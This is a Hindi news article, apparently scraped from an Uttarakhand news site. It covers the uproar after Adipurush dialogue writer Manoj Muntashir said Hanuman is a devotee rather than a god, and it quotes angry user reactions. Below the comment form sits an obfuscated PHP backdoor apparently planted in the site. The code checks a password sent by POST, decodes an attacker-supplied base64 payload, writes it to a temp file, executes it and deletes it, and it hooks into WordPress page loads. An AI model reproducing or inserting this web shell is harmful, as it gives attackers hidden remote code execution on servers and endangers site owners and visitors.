‘हनुमान भगवान नहीं, भक्त हैं…’, मनोज मुंतशिर के बयान पर मचा हाहाकार, भड़के लोग बोले- ‘दिमाग खराब हो गया है’

Uttarakhand Press 20 June 2023: Adipurush Dialogue Writer Manoj Muntashir Slammed: आदिपुरुष रिलीज के बाद से अपने छपरी डायलॉग्स को लेकर ट्रोलिंग झेल रही है। अब फिल्म के डायलॉग राइटर मनोज मुंतशिर ने भगवान हनुमान को लेकर कुछ ऐसा बोल दिया है कि बवाल मच गया है। आदिपुरुष को लेकर शुरू हुआ बवाल बढ़ता जा रहा है। सबसे ज्यादा कॉन्ट्रोवर्सी फिल्म के डायलॉग्स को लेकर हो रही है। इसकी वजह से आदिपुरुष के लिए डायलॉग लिखने वाले मनोज मुंतशिर ट्रोलर्स के निशाने पर हैं। अब उन्होंने भगवान हनुमान को लेकर कुछ ऐसी बयानबाजी कर दी है कि हाहाकार मच गया है। मनोज ने मुंतशिर ने कहा है कि बजरंगबली भगवान नहीं, भक्त हैं। भगवान हमने उन्हें बनाया है।

बचाव करना पड़ा भारी:
आदिपुरुष के डायलॉग्स को लेकर हो रहे विवाद के बीच मनोज मुंतशिर लगातार मीडिया में नजर आ रहे हैं और इंटरव्यू दे रहे हैं। दरअसल, उनके लिखे डायलॉग्स दर्शकों को पसंद नहीं आ रहे हैं। ऐसे में वो अपना बचाव करते फिर रहे हैं।

क्या बोले मनोज मुंतशिर:
मनोज मुंतशिर ने अपने एक हालिया इंटरव्यू में खुद का बचाव करते हुए भगवान हनुमान को लेकर कहा- “हनुमान ने श्री राम की तरह संवाद नहीं किए हैं, क्योंकि वे भगवान नहीं, भक्त हैं। हमने उन्हें भगवान बनाया है क्योंकि उनकी भक्ति में वो पावर था।”

लोगों ने दिमाग लगाया ठिकाने:
सोशल मीडिया पर मनोज मुंतशिर की इस बयानबाजी का वीडियो जैसे ही सामने आया, लोगों का गुस्सा सातवें आसमान पर पहुंच गया। फिर क्या था लोगों ने उन्हें फटकार लगानी शुरू कर दी और मनोज बुरी तरह ट्रोल हो रहे हैं। कुछ लोगों ने तो उन्हें इंटरव्यू ना देने की भी सलाह दे डाली।

चुप रहने की दी सलाह:
मनोज मुंतशिर के बयान पर रिएक्ट करते हुए एक यूजर ने कहा, “दिमाग खराब गो गया है इसका…शिव का रूप हैं हनुमान भगवान।” एक अन्य यूजर ने कहा, “सबसे पहले मनोज मुंतशिर को इंटरव्यू देना बंद कर देना चाहिए।” एक और यूजर ने कहा, “कृपया कोई इसे चुप कराओ।”

ट्विटर पर उड़ी धज्जियां:
मनोज मुंतशिर की धज्जियां उड़ाते हुए एक यूजर ने कहा, “हनुमान जी भगवान शिव के अवतार थे, इस मूर्ख व्यक्ति के पास दिमाग नहीं है और यह रामायण के डायलॉग लिख रहा है।” वहीं, एक ने मनोज का सलाह देते हुए कहा, “अपनी जांच करवाओ।”

Read Previous

तारक मेहता का उल्टा चश्मा के निर्माता असित मोदी सहित 2 के खिलाफ FIR दर्ज, यौन शोषण का आरोप

Read Next

Nainital: बेटी के रिश्ते की बात कर बाइक से घर लौट रहे कारोबारी की सड़क हादसे मौत, बेटी गंभीर रूप से घायल

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}